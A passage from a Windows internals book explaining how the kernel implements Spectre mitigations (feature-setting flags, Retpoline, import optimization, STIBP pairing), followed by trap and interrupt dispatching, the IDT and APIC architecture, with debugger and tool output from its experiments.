HKLM\System\CurrentControlSet\Control\Session Manager\Memory
Management\FeatureSettings registry value. The value is a 32-bit bitmask,
where each bit corresponds to an individual setting. Table 8-2 describes
individual feature settings and their meaning.
Table 8-2 Feature settings and their values
Name
V
a
l
u
e
Meaning
FEATURE_S
ETTINGS_DI
SABLE_IBRS
_EXCEPT_
HVROOT
0
x
1
Disable IBRS except for non-nested root partition
(default setting for Server SKUs)
FEATURE_S
ETTINGS_DI
SABLE_KVA
_SHADOW
0
x
2
Force KVA shadowing to be disabled
FEATURE_S
ETTINGS_DI
SABLE_IBRS
0
x
4
Disable IBRS, regardless of machine
configuration
FEATURE_S
ETTINGS_SE
T_SSBD_AL
WAYS
0
x
8
Always set SSBD in kernel and user
FEATURE_S
ETTINGS_SE
T_SSBD_IN_
KERNEL
0
x
1
0
Set SSBD only in kernel mode (leaving user-
mode code to be vulnerable to SSB attacks)
FEATURE_S
ETTINGS_US
ER_STIBP_A
LWAYS
0
x
2
0
Always keep STIBP on for user-threads,
regardless of STIBP pairing
FEATURE_S
ETTINGS_DI
SABLE_USE
R_TO_USER
0
x
4
0
Disables the default speculation mitigation
strategy (for AMD systems only) and enables the
user-to-user only mitigation. When this flag is set,
no speculation controls are set when running in
kernel mode.
FEATURE_S
ETTINGS_DI
SABLE_STIB
P_PAIRING
0
x
8
0
Always disable STIBP pairing
FEATURE_S
ETTINGS_DI
SABLE_RET
POLINE
0
x
1
0
0
Always disable Retpoline
FEATURE_S
ETTINGS_FO
RCE_ENABL
E_RETPOLIN
E
0
x
2
0
0
Enable Retpoline regardless of the CPU support
of IBPB or IBRS (Retpoline needs at least IBPB
to properly protect against Spectre v2)
FEATURE_S
ETTINGS_DI
SABLE_IMP
0
x
2
Disable Import Optimization regardless of
Retpoline
ORT_LINKIN
G
0
0
0
0
Retpoline and import optimization
Keeping hardware mitigations enabled has strong performance penalties for
the system, simply because the CPU’s branch predictor is limited or disabled
when the mitigations are enabled. This was not acceptable for games and
mission-critical applications, which were running with a lot of performance
degradation. The mitigation that was bringing most of the performance
degradation was IBRS (or IBPB), while used for protecting against Spectre.
Protecting against the first variant of Spectre was possible without using any
hardware mitigations thanks to the memory fence instructions. A good
example is the LFENCE, available in the x86 architecture. Those instructions
force the processor not to execute any new operations speculatively before
the fence itself completes. Only when the fence completes (and all the
instructions located before it have been retired) will the processor’s pipeline
restart to execute (and to speculate) new opcodes. The second variant of
Spectre was still requiring hardware mitigations, though, which implies all
the performance problems brought by IBRS and IBPB.
To overcome the problem, Google engineers designed a novel binary-
modification technique called Retpoline. The Retpoline sequence, shown in
Figure 8-9, allows indirect branches to be isolated from speculative
execution. Instead of performing a vulnerable indirect call, the processor
jumps to a safe control sequence, which dynamically modifies the stack,
captures eventual speculation, and lands to the new target thanks to a
“return” operation.
Figure 8-9 Retpoline code sequence of x86 CPUs.
In Windows, Retpoline is implemented in the NT kernel, which can apply
the Retpoline code sequence to itself and to external driver images
dynamically through the Dynamic Value Relocation Table (DVRT). When a
kernel image is compiled with Retpoline enabled (through a compatible
compiler), the compiler inserts an entry in the image’s DVRT for each
indirect branch that exists in the code, describing its address and type. The
opcode that performs the indirect branch is kept as it is in the final code but
augmented with a variable size padding. The entry in the DVRT includes all
the information that the NT kernel needs to modify the indirect branch’s
opcode dynamically. This architecture ensures that external drivers compiled
with Retpoline support can run also on older OS versions, which will simply
skip parsing the entries in the DVRT table.
Note
The DVRT was originally developed for supporting kernel ASLR
(Address Space Layout Randomization, discussed in Chapter 5 of Part 1).
The table was later extended to include Retpoline descriptors. The system
can identify which version of the table an image includes.
In phase -1 of its initialization, the kernel detects whether the processor is
vulnerable to Spectre, and, in case the system is compatible and enough
hardware mitigations are available, it enables Retpoline and applies it to the
NT kernel image and the HAL. The
RtlPerformRetpolineRelocationsOnImage routine scans the DVRT and
replaces each indirect branch described by an entry in the table with a direct
branch, which is not vulnerable to speculative attacks, targeting the Retpoline
code sequence. The original target address of the indirect branch is saved in a
CPU register (R10 in AMD and Intel processors), with a single instruction
that overwrites the padding generated by the compiler. The Retpoline code
sequence is stored in the RETPOL section of the NT kernel’s image. The
page backing the section is mapped in the end of each driver’s image.
Before being started, boot drivers are physically relocated by the internal
MiReloadBootLoadedDrivers routine, which also applies the needed fixups
to each driver’s image, including Retpoline. All the boot drivers, the NT
kernel, and HAL images are allocated in a contiguous virtual address space
by the Windows Loader and do not have an associated control area,
rendering them not pageable. This means that all the memory backing the
images is always resident, and the NT kernel can use the same
RtlPerformRetpolineRelocationsOnImage function to modify each indirect
branch in the code directly. If HVCI is enabled, the system must call the
Secure Kernel to apply Retpoline (through the
PERFORM_RETPOLINE_RELOCATIONS secure call). Indeed, in that
scenario, the drivers’ executable memory is protected against any
modification, following the W^X principle described in Chapter 9. Only the
Secure Kernel is allowed to perform the modification.
Note
Retpoline and Import Optimization fixups are applied by the kernel to
boot drivers before Patchguard (also known as Kernel Patch Protection;
see Part 1, Chapter 7, “Security,” for further details) initializes and
protects some of them. It is illegal for drivers and the NT kernel itself to
modify code sections of protected drivers.
Runtime drivers, as explained in Chapter 5 of Part 1, are loaded by the NT
memory manager, which creates a section object backed by the driver’s
image file. This implies that a control area, including a prototype PTEs array,
is created to track the pages of the memory section. For driver sections, some
of the physical pages are initially brought in memory just for code integrity
verification and then moved in the standby list. When the section is later
mapped and the driver’s pages are accessed for the first time, physical pages
from the standby list (or from the backing file) are materialized on-demand
by the page fault handler. Windows applies Retpoline on the shared pages
pointed by the prototype PTEs. If the same section is also mapped by a user-
mode application, the memory manager creates new private pages and copies
the content of the shared pages in the private ones, reverting Retpoline (and
Import Optimization) fixups.
Note
Some newer Intel processors also speculate on “return” instructions. For
those CPUs, Retpoline cannot be enabled because it would not be able to
protect against Spectre v2. In this situation, only hardware mitigations can
be applied. Enhanced IBRS (a new hardware mitigation) solves the
performance problems of IBRS.
The Retpoline bitmap
One of the original design goals (restraints) of the Retpoline implementation
in Windows was to support a mixed environment composed of drivers
compatible with Retpoline and drivers not compatible with it, while
maintaining the overall system protection against Spectre v2. This implies
that drivers that do not support Retpoline should be executed with IBRS on
(or STIBP followed by an IBPB on kernel entry, as discussed previously in
the “Hardware indirect branch controls” section), whereas others can run
without any hardware speculation mitigations enabled (the protection is
brought by the Retpoline code sequences and memory fences).
To dynamically achieve compatibility with older drivers, in the phase 0 of
its initialization, the NT kernel allocates and initializes a dynamic bitmap that
keeps track of each 64 KB chunk that compose the entire kernel address
space. In this model, a bit set to 1 indicates that the 64-KB chunk of address
space contains Retpoline compatible code; a 0 means the opposite. The NT
kernel then sets to 1 the bits referring to the address spaces of the HAL and
NT images (which are always Retpoline compatible). Every time a new
kernel image is loaded, the system tries to apply Retpoline to it. If the
application succeeds, the respective bits in the Retpoline bitmap are set to 1.
The Retpoline code sequence is augmented to include a bitmap check:
Every time an indirect branch is performed, the system checks whether the
original call target resides in a Retpoline-compatible module. In case the
check succeeds (and the relative bit is 1), the system executes the Retpoline
code sequence (shown in Figure 8-9) and lands in the target address securely.
Otherwise (when the bit in the Retpoline bitmap is 0), a Retpoline exit
sequence is initialized. The RUNNING_NON_RETPOLINE_CODE flag is
set in the current CPU’s PRCB (needed for context switches), IBRS is
enabled (or STIBP, depending on the hardware configuration), an IBPB and
LFENCE are emitted if needed, and the SPEC_CONTROL kernel event is
generated. Finally, the processor lands on the target address, still in a secure
way (hardware mitigations provide the needed protection).
When the thread quantum ends, and the scheduler selects a new thread, it
saves the Retpoline status (represented by the presence of the
RUNNING_NON_RETPOLINE_CODE flag) of the current processors in the
KTHREAD data structure of the old thread. In this way, when the old thread
is selected again for execution (or a kernel trap entry happens), the system
knows that it needs to re-enable the needed hardware speculation mitigations
with the goal of keeping the system always protected.
Import optimization
Retpoline entries in the DVRT also describe indirect branches targeting
imported functions. An imported control transfer entry in the DVRT
describes this kind of branch by using an index referring to the correct entry
in the IAT. (The IAT is the Image Import Address Table, an array of
imported functions’ pointers compiled by the loader.) After the Windows
loader has compiled the IAT, it is unlikely that its content would have
changed (excluding some rare scenarios). As shown in Figure 8-10, it turns
out that it is not needed to transform an indirect branch targeting an imported
function to a Retpoline one because the NT kernel can ensure that the virtual
addresses of the two images (caller and callee) are close enough to directly
invoke the target (less than 2 GB).
Figure 8-10 Different indirect branches on the ExAllocatePool function.
Import optimization (internally also known as “import linking”) is the
feature that uses Retpoline dynamic relocations to transform indirect calls
targeting imported functions into direct branches. If a direct branch is used to
divert code execution to an imported function, there is no need to apply
Retpoline because direct branches are not vulnerable to speculation attacks.
The NT kernel applies Import Optimization at the same time it applies
Retpoline, and even though the two features can be configured
independently, they use the same DVRT entries to work correctly. With
Import Optimization, Windows has been able to gain a performance boost
even on systems that are not vulnerable to Spectre v2. (A direct branch does
not require any additional memory access.)
STIBP pairing
In hyperthreaded systems, for protecting user-mode code against Spectre v2,
the system should run user threads with at least STIBP on. On
nonhyperthreaded systems, this is not needed: protection against a previous
user-mode thread speculation is already achieved thanks to the IBRS being
enabled while previously executing kernel-mode code. In case Retpoline is
enabled, the needed IBPB is emitted in the first kernel trap return executed
after a cross-process thread switch. This ensures that the CPU branch
prediction buffer is empty before executing the code of the user thread.
Leaving STIBP enabled in a hyper-threaded system has a performance
penalty, so by default it is disabled for user-mode threads, leaving a thread to
be potentially vulnerable by speculation from a sibling SMT thread. The end-
user can manually enable STIBP for user threads through the
USER_STIBP_ALWAYS feature setting (see the “Hardware Indirect Branch
Controls” section previously in this chapter for more details) or through the
RESTRICT_INDIRECT_BRANCH_PREDICTION process mitigation
option.
The described scenario is not ideal. A better solution is implemented in the
STIBP pairing mechanism. STIBP pairing is enabled by the I/O manager in
phase 1 of the NT kernel initialization (using the KeOptimizeSpecCtrlSettings
function) only under certain conditions. The system should have
hyperthreading enabled, and the CPU should support IBRS and STIBP.
Furthermore, STIBP pairing is compatible only on non-nested virtualized
environments or when Hyper-V is disabled (refer to Chapter 9 for further
details.)
In an STIBP pairing scenario, the system assigns to each process a security
domain identifier (stored in the EPROCESS data structure), which is
represented by a 64-bit number. The system security domain identifier (which
equals 0) is assigned only to processes running under the System or a fully
administrative token. Nonsystem security domains are assigned at process
creation time (by the internal PspInitializeProcessSecurity function)
following these rules:
■ If the new process is created without a new primary token explicitly
assigned to it, it obtains the same security domain of the parent
process that creates it.
■ In case a new primary token is explicitly specified for the new process
(by using the CreateProcessAsUser or CreateProcessWithLogon
APIs, for example), a new user security domain ID is generated for
the new process, starting from the internal PsNextSecurityDomain
symbol. The latter is incremented every time a new domain ID is
generated (this ensures that during the system lifetime, no security
domains can collide).
■ Note that a new primary token can be also assigned using the
NtSetInformationProcess API (with the ProcessAccessToken
information class) after the process has been initially created. For the
API to succeed, the process should have been created as suspended
(no threads run in it). At this stage, the process still has its original
token in an unfrozen state. A new security domain is assigned
following the same rules described earlier.
Security domains can also be assigned manually to different processes
belonging to the same group. An application can replace the security domain
of a process with another one of a process belonging to the same group using
the NtSetInformationProcess API with the
ProcessCombineSecurityDomainsInformation class. The API accepts two
process handles and replaces the security domain of the first process only if
the two tokens are frozen, and the two processes can open each other with the
PROCESS_VM_WRITE and PROCESS_VM_OPERATION access rights.
Security domains allow the STIBP pairing mechanism to work. STIBP
pairing links a logical processor (LP) with its sibling (both share the same
physical core. In this section, we use the term LP and CPU interchangeably).
Two LPs are paired by the STIBP pairing algorithm (implemented in the
internal KiUpdateStibpPairing function) only when the security domain of
the local CPU is the same as the one of the remote CPU, or one of the two
LPs is Idle. In these cases, both the LPs can run without STIBP being set and
still be implicitly protected against speculation (there is no advantage in
attacking a sibling CPU running in the same security context).
The STIBP pairing algorithm is implemented in the KiUpdateStibpPairing
function and includes a full state machine. The routine is invoked by the trap
exit handler (invoked when the system exits the kernel for executing a user-
mode thread) only in case the pairing state stored in the CPU’s PRCB is
stale. The pairing state of an LP can become stale mainly for two reasons:
■ The NT scheduler has selected a new thread to be executed in the
current CPU. If the new thread security domain is different than the
previous one, the CPU’s PRCB pairing state is marked as stale. This
allows the STIBP pairing algorithm to re-evaluate the pairing state of
the two.
■ When the sibling CPU exits from its idle state, it requests the remote
CPU to re-evaluate its STIBP pairing state.
Note that when an LP is running code with STIBP enabled, it is protected
from the sibling CPU speculation. STIBP pairing has been developed based
also on the opposite notion: when an LP executes with STIBP enabled, it is
guaranteed that its sibling CPU is protected against itself. This implies that
when a context switches to a different security domain, there is no need to
interrupt the sibling CPU even though it is running user-mode code with
STIBP disabled.
The described scenario is not true only when the scheduler selects a VP-
dispatch thread (backing a virtual processor of a VM in case the Root
scheduler is enabled; see Chapter 9 for further details) belonging to the
VMMEM process. In this case, the system immediately sends an IPI to the
sibling thread for updating its STIBP pairing state. Indeed, a VP-dispatch
thread runs guest-VM code, which can always decide to disable STIBP,
moving the sibling thread in an unprotected state (both runs with STIBP
disabled).
EXPERIMENT: Querying system side-channel
mitigation status
Windows exposes side-channel mitigation information through the
SystemSpeculationControl Information and
SystemSecureSpeculationControlInformation information classes
used by the NtQuerySystemInformation native API. Multiple tools
exist that interface with this API and show to the end user the
system side-channel mitigation status:
■ The SpeculationControl PowerShell script, developed by
Matt Miller and officially supported by Microsoft, which is
open source and available at the following GitHub
repository: https://github.com/microsoft/SpeculationControl
■ The SpecuCheck tool, developed by Alex Ionescu (one of
the authors of this book), which is open source and
available at the following GitHub repository:
https://github.com/ionescu007/SpecuCheck
■ The SkTool, developed by Andrea Allievi (one of the
authors of this book) and distributed (at the time of this
writing) in newer Insider releases of Windows.
All of the three tools yield more or less the same results. Only
the SkTool is able to show the side-channel mitigations
implemented in the Secure Kernel, though (the hypervisor and the
Secure Kernel are described in detail in Chapter 9.) In this
experiment, you will understand which mitigations have been
enabled in your system. Download SpecuCheck and execute it by
opening a command prompt window (type cmd in the Cortana
search box). You should get output like the following:
Click here to view code image
SpecuCheck v1.1.1 -- Copyright(c) 2018 Alex Ionescu
https://ionescu007.github.io/SpecuCheck/ -- @aionescu
--------------------------------------------------------
Mitigations for CVE-2017-5754 [rogue data cache load]
--------------------------------------------------------
[-] Kernel VA Shadowing Enabled: yes
> Unnecessary due lack of CPU vulnerability: no
> With User Pages Marked Global: no
> With PCID Support: yes
> With PCID Flushing Optimization (INVPCID): yes
Mitigations for CVE-2018-3620 [L1 terminal fault]
[-] L1TF Mitigation Enabled: yes
> Unnecessary due lack of CPU vulnerability: no
> CPU Microcode Supports Data Cache Flush: yes
> With KVA Shadow and Invalid PTE Bit: yes
(The output has been trimmed for space reasons.)
You can also download the latest Windows Insider release and
try the SkTool. When launched with no command-line arguments,
by default the tool displays the status of the hypervisor and Secure
Kernel. To show the status of all the side-channel mitigations, you
should invoke the tool with the /mitigations command-line
argument:
Click here to view code image
Hypervisor / Secure Kernel / Secure Mitigations Parser Tool
1.0
Querying Speculation Features... Success!
This system supports Secure Speculation Controls.
System Speculation Features.
Enabled: 1
Hardware support: 1
IBRS Present: 1
STIBP Present: 1
SMEP Enabled: 1
Speculative Store Bypass Disable (SSBD) Available: 1
Speculative Store Bypass Disable (SSBD) Supported by OS:
1
Branch Predictor Buffer (BPB) flushed on Kernel/User
transition: 1
Retpoline Enabled: 1
Import Optimization Enabled: 1
SystemGuard (Secure Launch) Enabled: 0 (Capable: 0)
SystemGuard SMM Protection (Intel PPAM / AMD SMI monitor)
Enabled: 0
Secure system Speculation Features.
KVA Shadow supported: 1
KVA Shadow enabled: 1
KVA Shadow TLB flushing strategy: PCIDs
Minimum IBPB Hardware support: 0
IBRS Present: 0 (Enhanced IBRS: 0)
STIBP Present: 0
SSBD Available: 0 (Required: 0)
Branch Predictor Buffer (BPB) flushed on Kernel/User
transition: 0
Branch Predictor Buffer (BPB) flushed on User/Kernel and
VTL 1 transition: 0
L1TF mitigation: 0
Microarchitectural Buffers clearing: 1
Trap dispatching
Interrupts and exceptions are operating system conditions that divert the
processor to code outside the normal flow of control. Either hardware or
software can generate them. The term trap refers to a processor’s mechanism
for capturing an executing thread when an exception or an interrupt occurs
and transferring control to a fixed location in the operating system. In
Windows, the processor transfers control to a trap handler, which is a
function specific to a particular interrupt or exception. Figure 8-11 illustrates
some of the conditions that activate trap handlers.
The kernel distinguishes between interrupts and exceptions in the
following way. An interrupt is an asynchronous event (one that can occur at
any time) that is typically unrelated to what the processor is executing.
Interrupts are generated primarily by I/O devices, processor clocks, or timers,
and they can be enabled (turned on) or disabled (turned off). An exception, in
contrast, is a synchronous condition that usually results from the execution of
a specific instruction. (Aborts, such as machine checks, are a type of
processor exception that’s typically not associated with instruction
execution.) Both exceptions and aborts are sometimes called faults, such as
when talking about a page fault or a double fault. Running a program for a
second time with the same data under the same conditions can reproduce
exceptions. Examples of exceptions include memory-access violations,
certain debugger instructions, and divide-by-zero errors. The kernel also
regards system service calls as exceptions (although technically they’re
system traps).
Figure 8-11 Trap dispatching.
Either hardware or software can generate exceptions and interrupts. For
example, a bus error exception is caused by a hardware problem, whereas a
divide-by-zero exception is the result of a software bug. Likewise, an I/O
device can generate an interrupt, or the kernel itself can issue a software
interrupt (such as an APC or DPC, both of which are described later in this
chapter).
When a hardware exception or interrupt is generated, x86 and x64
processors first check whether the current Code Segment (CS) is in CPL 0 or
below (i.e., if the current thread was running in kernel mode or user mode).
In the case where the thread was already running in Ring 0, the processor
saves (or pushes) on the current stack the following information, which
represents a kernel-to-kernel transition.
■ The current processor flags (EFLAGS/RFLAGS)
■ The current code segment (CS)
■ The current program counter (EIP/RIP)
■ Optionally, for certain kind of exceptions, an error code
In situations where the processor was actually running user-mode code in
Ring 3, the processor first looks up the current TSS based on the Task
Register (TR) and switches to the SS0/ESP0 on x86 or simply RSP0 on x64,
as described in the “Task state segments” section earlier in this chapter. Now
that the processor is executing on the kernel stack, it saves the previous SS
(the user-mode value) and the previous ESP (the user-mode stack) first and
then saves the same data as during kernel-to-kernel transitions.
Saving this data has a twofold benefit. First, it records enough machine
state on the kernel stack to return to the original point in the current thread’s
control flow and continue execution as if nothing had happened. Second, it
allows the operating system to know (based on the saved CS value) where
the trap came from—for example, to know if an exception came from user-
mode code or from a kernel system call.
Because the processor saves only enough information to restore control
flow, the rest of the machine state—including registers such as EAX, EBX,
ECX, EDI, and so on is saved in a trap frame, a data structure allocated by
Windows in the thread’s kernel stack. The trap frame stores the execution
state of the thread, and is a superset of a thread’s complete context, with
additional state information. You can view its definition by using the dt
nt!_KTRAP_FRAME command in the kernel debugger, or, alternatively, by
downloading the Windows Driver Kit (WDK) and examining the NTDDK.H
header file, which contains the definition with additional commentary.
(Thread context is described in Chapter 5 of Part 1.) The kernel handles
software interrupts either as part of hardware interrupt handling or
synchronously when a thread invokes kernel functions related to the software
interrupt.
In most cases, the kernel installs front-end, trap-handling functions that
perform general trap-handling tasks before and after transferring control to
other functions that field the trap. For example, if the condition was a device
interrupt, a kernel hardware interrupt trap handler transfers control to the
interrupt service routine (ISR) that the device driver provided for the
interrupting device. If the condition was caused by a call to a system service,
the general system service trap handler transfers control to the specified
system service function in the executive.
In unusual situations, the kernel can also receive traps or interrupts that it
doesn’t expect to see or handle. These are sometimes called spurious or
unexpected traps. The trap handlers typically execute the system function
KeBugCheckEx, which halts the computer when the kernel detects
problematic or incorrect behavior that, if left unchecked, could result in data
corruption. The following sections describe interrupt, exception, and system
service dispatching in greater detail.
Interrupt dispatching
Hardware-generated interrupts typically originate from I/O devices that must
notify the processor when they need service. Interrupt-driven devices allow
the operating system to get the maximum use out of the processor by
overlapping central processing with I/O operations. A thread starts an I/O
transfer to or from a device and then can execute other useful work while the
device completes the transfer. When the device is finished, it interrupts the
processor for service. Pointing devices, printers, keyboards, disk drives, and
network cards are generally interrupt driven.
System software can also generate interrupts. For example, the kernel can
issue a software interrupt to initiate thread dispatching and to break into the
execution of a thread asynchronously. The kernel can also disable interrupts
so that the processor isn’t interrupted, but it does so only infrequently—at
critical moments while it’s programming an interrupt controller or
dispatching an exception, for example.
The kernel installs interrupt trap handlers to respond to device interrupts.
Interrupt trap handlers transfer control either to an external routine (the ISR)
that handles the interrupt or to an internal kernel routine that responds to the
interrupt. Device drivers supply ISRs to service device interrupts, and the
kernel provides interrupt-handling routines for other types of interrupts.
In the following subsections, you’ll find out how the hardware notifies the
processor of device interrupts, the types of interrupts the kernel supports,
how device drivers interact with the kernel (as a part of interrupt processing),
and the software interrupts the kernel recognizes (plus the kernel objects that
are used to implement them).
Hardware interrupt processing
On the hardware platforms supported by Windows, external I/O interrupts
come into one of the inputs on an interrupt controller, for example an I/O
Advanced Programmable Interrupt Controller (IOAPIC). The controller, in
turn, interrupts one or more processors’ Local Advanced Programmable
Interrupt Controllers (LAPIC), which ultimately interrupt the processor on a
single input line.
Once the processor is interrupted, it queries the controller to get the global
system interrupt vector (GSIV), which is sometimes represented as an
interrupt request (IRQ) number. The interrupt controller translates the GSIV
to a processor interrupt vector, which is then used as an index into a data
structure called the interrupt dispatch table (IDT) that is stored in the CPU’s
IDT Register, or IDTR, which returns the matching IDT entry for the
interrupt vector.
Based on the information in the IDT entry, the processor can transfer control
to an appropriate interrupt dispatch routine running in Ring 0 (following the
process described at the start of this section), or it can even load a new TSS
and update the Task Register (TR), using a process called an interrupt gate.
In the case of Windows, at system boot time, the kernel fills in the IDT with
pointers to both dedicated kernel and HAL routines for each exception and
internally handled interrupt, as well as with pointers to thunk kernel routines
called KiIsrThunk, that handle external interrupts that third-party device
drivers can register for. On x86 and x64-based processor architectures, the
first 32 IDT entries, associated with interrupt vectors 0–31 are marked as
reserved for processor traps, which are described in Table 8-3.
Table 8-3 Processor traps
Vector
(Mnemonic)
Meaning
0 (#DE)
Divide error
1 (#DB)
Debug trap
2 (NMI)
Nonmaskable interrupt
3 (#BP)
Breakpoint trap
4 (#OF)
Overflow fault
5 (#BR)
Bound fault
6 (#UD)
Undefined opcode fault
7 (#NM)
FPU error
8 (#DF)
Double fault
9 (#MF)
Coprocessor fault (no
longer used)
10 (#TS)
TSS fault
11 (#NP)
Segment fault
12 (#SS)
Stack fault
13 (#GP)
General protection fault
14 (#PF)
Page fault
15
Reserved
16 (#MF)
Floating point fault
17 (#AC)
Alignment check fault
18 (#MC)
Machine check abort
19 (#XM)
SIMD fault
20 (#VE)
Virtualization exception
21 (#CP)
Control protection
exception
22-31
Reserved
The remainder of the IDT entries are based on a combination of hardcoded
values (for example, vectors 30 to 34 are always used for Hyper-V-related
VMBus interrupts) as well as negotiated values between the device drivers,
hardware, interrupt controller(s), and platform software such as ACPI. For
example, a keyboard controller might send interrupt vector 82 on one
particular Windows system and 67 on a different one.
EXPERIMENT: Viewing the 64-bit IDT
You can view the contents of the IDT, including information on
what trap handlers Windows has assigned to interrupts (including
exceptions and IRQs), using the !idt kernel debugger command.
The !idt command with no flags shows simplified output that
includes only registered hardware interrupts (and, on 64-bit
machines, the processor trap handlers).
The following example shows what the output of the !idt
command looks like on an x64 system:
Click here to view code image
0: kd> !idt
Dumping IDT: fffff8027074c000
00: fffff8026e1bc700 nt!KiDivideErrorFault
01: fffff8026e1bca00 nt!KiDebugTrapOrFault Stack =
0xFFFFF8027076E000
02: fffff8026e1bcec0 nt!KiNmiInterrupt Stack =
0xFFFFF8027076A000
03: fffff8026e1bd380 nt!KiBreakpointTrap
04: fffff8026e1bd680 nt!KiOverflowTrap
05: fffff8026e1bd980 nt!KiBoundFault
06: fffff8026e1bde80 nt!KiInvalidOpcodeFault
07: fffff8026e1be340 nt!KiNpxNotAvailableFault
08: fffff8026e1be600 nt!KiDoubleFaultAbort Stack =
0xFFFFF80270768000
09: fffff8026e1be8c0 nt!KiNpxSegmentOverrunAbort
0a: fffff8026e1beb80 nt!KiInvalidTssFault
0b: fffff8026e1bee40 nt!KiSegmentNotPresentFault
0c: fffff8026e1bf1c0 nt!KiStackFault
0d: fffff8026e1bf500 nt!KiGeneralProtectionFault
0e: fffff8026e1bf840 nt!KiPageFault
10: fffff8026e1bfe80 nt!KiFloatingErrorFault
11: fffff8026e1c0200 nt!KiAlignmentFault
12: fffff8026e1c0500 nt!KiMcheckAbort Stack =
0xFFFFF8027076C000
13: fffff8026e1c0fc0 nt!KiXmmException
14: fffff8026e1c1380 nt!KiVirtualizationException
15: fffff8026e1c1840 nt!KiControlProtectionFault
1f: fffff8026e1b5f50 nt!KiApcInterrupt
20: fffff8026e1b7b00 nt!KiSwInterrupt
29: fffff8026e1c1d00 nt!KiRaiseSecurityCheckFailure
2c: fffff8026e1c2040 nt!KiRaiseAssertion
2d: fffff8026e1c2380 nt!KiDebugServiceTrap
2f: fffff8026e1b80a0 nt!KiDpcInterrupt
30: fffff8026e1b64d0 nt!KiHvInterrupt
31: fffff8026e1b67b0 nt!KiVmbusInterrupt0
32: fffff8026e1b6a90 nt!KiVmbusInterrupt1
33: fffff8026e1b6d70 nt!KiVmbusInterrupt2
34: fffff8026e1b7050 nt!KiVmbusInterrupt3
35: fffff8026e1b48b8 hal!HalpInterruptCmciService
(KINTERRUPT fffff8026ea59fe0)
b0: fffff8026e1b4c90 ACPI!ACPIInterruptServiceRoutine
(KINTERRUPT ffffb88062898dc0)
ce: fffff8026e1b4d80 hal!HalpIommuInterruptRoutine
(KINTERRUPT fffff8026ea5a9e0)
d1: fffff8026e1b4d98 hal!HalpTimerClockInterrupt
(KINTERRUPT fffff8026ea5a7e0)
d2: fffff8026e1b4da0 hal!HalpTimerClockIpiRoutine
(KINTERRUPT fffff8026ea5a6e0)
d7: fffff8026e1b4dc8 hal!HalpInterruptRebootService
(KINTERRUPT fffff8026ea5a4e0)
d8: fffff8026e1b4dd0 hal!HalpInterruptStubService
(KINTERRUPT fffff8026ea5a2e0)
df: fffff8026e1b4e08 hal!HalpInterruptSpuriousService
(KINTERRUPT fffff8026ea5a1e0)
e1: fffff8026e1b8570 nt!KiIpiInterrupt
e2: fffff8026e1b4e20 hal!HalpInterruptLocalErrorService
(KINTERRUPT fffff8026ea5a3e0)
e3: fffff8026e1b4e28
hal!HalpInterruptDeferredRecoveryService
(KINTERRUPT fffff8026ea5a0e0)
fd: fffff8026e1b4ef8 hal!HalpTimerProfileInterrupt
(KINTERRUPT fffff8026ea5a8e0)
fe: fffff8026e1b4f00 hal!HalpPerfInterrupt (KINTERRUPT
fffff8026ea5a5e0)
On the system used to provide the output for this experiment, the
ACPI SCI ISR is at interrupt number B0h. You can also see that
interrupt 14 (0Eh) corresponds to KiPageFault, which is a type of
predefined CPU trap, as explained earlier.
You can also note that some of the interrupts—specifically 1, 2,
8, and 12—have a Stack pointer next to them. These correspond to
the traps explained in the section on “Task state segments” from
earlier, which require dedicated safe kernel stacks for processing.
The debugger knows these stack pointers by dumping the IDT
entry, which you can do as well by using the dx command and
dereferencing one of the interrupt vectors in the IDT. Although you
can obtain the IDT from the processor’s IDTR, you can also obtain
it from the kernel’s KPCR structure, which has a pointer to it in a
field called IdtBase.
Click here to view code image
0: kd> dx @$pcr->IdtBase[2].IstIndex
@$pcr->IdtBase[2].IstIndex : 0x3 [Type: unsigned short]
0: kd> dx @$pcr->IdtBase[0x12].IstIndex
@$pcr->IdtBase[0x12].IstIndex : 0x2 [Type: unsigned short]
If you compare the IDT Index values seen here with the previous
experiment on dumping the x64 TSS, you should find the matching
kernel stack pointers associated with this experiment.
Each processor has a separate IDT (pointed to by their own IDTR) so that
different processors can run different ISRs, if appropriate. For example, in a
multiprocessor system, each processor receives the clock interrupt, but only
one processor updates the system clock in response to this interrupt. All the
processors, however, use the interrupt to measure thread quantum and to
initiate rescheduling when a thread’s quantum ends. Similarly, some system
configurations might require that a particular processor handle certain device
interrupts.
Programmable interrupt controller architecture
Traditional x86 systems relied on the i8259A Programmable Interrupt
Controller (PIC), a standard that originated with the original IBM PC. The
i8259A PIC worked only with uniprocessor systems and had only eight
interrupt lines. However, the IBM PC architecture defined the addition of a
second PIC, called the secondary, whose interrupts are multiplexed into one
of the primary PIC’s interrupt lines. This provided 15 total interrupts (7 on
the primary and 8 on the secondary, multiplexed through the master’s eighth
interrupt line). Because PICs had such a quirky way of handling more than 8
devices, and because even 15 became a bottleneck, as well as due to various
electrical issues (they were prone to spurious interrupts) and the limitations of
uniprocessor support, modern systems eventually phased out this type of
interrupt controller, replacing it with a variant called the i82489 Advanced
Programmable Interrupt Controller (APIC).
Because APICs work with multiprocessor systems, Intel and other companies
defined the Multiprocessor Specification (MPS), a design standard for x86
multiprocessor systems that centered on the use of APIC and the integration
of both an I/O APIC (IOAPIC) connected to external hardware devices to a
Local APIC (LAPIC), connected to the processor core. With time, the MPS
standard was folded into the Advanced Configuration and Power Interface
(ACPI)—a similar acronym to APIC by chance. To provide compatibility
with uniprocessor operating systems and boot code that starts a
multiprocessor system in uniprocessor mode, APICs support a PIC
compatibility mode with 15 interrupts and delivery of interrupts to only the
primary processor. Figure 8-12 depicts the APIC architecture.
Figure 8-12 APIC architecture.
As mentioned, the APIC consists of several components: an I/O APIC that
receives interrupts from devices, local APICs that receive interrupts from the
I/O APIC on the bus and that interrupt the CPU they are associated with, and
an i8259A-compatible interrupt controller that translates APIC input into
PIC-equivalent signals. Because there can be multiple I/O APICs on the
system, motherboards typically have a piece of core logic that sits between
them and the processors. This logic is responsible for implementing interrupt
routing algorithms that both balance the device interrupt load across
processors and attempt to take advantage of locality, delivering device
interrupts to the same processor that has just fielded a previous interrupt of
the same type. Software programs can reprogram the I/O APICs with a fixed
routing algorithm that bypasses this piece of chipset logic. In most cases,
Windows will reprogram the I/O APIC with its own routing logic to support
various features such as interrupt steering, but device drivers and firmware
also have a say.
Because the x64 architecture is compatible with x86 operating systems,
x64 systems must provide the same interrupt controllers as the x86. A
significant difference, however, is that the x64 versions of Windows refused
to run on systems that did not have an APIC because they use the APIC for
interrupt control, whereas x86 versions of Windows supported both PIC and
APIC hardware. This changed with Windows 8 and later versions, which
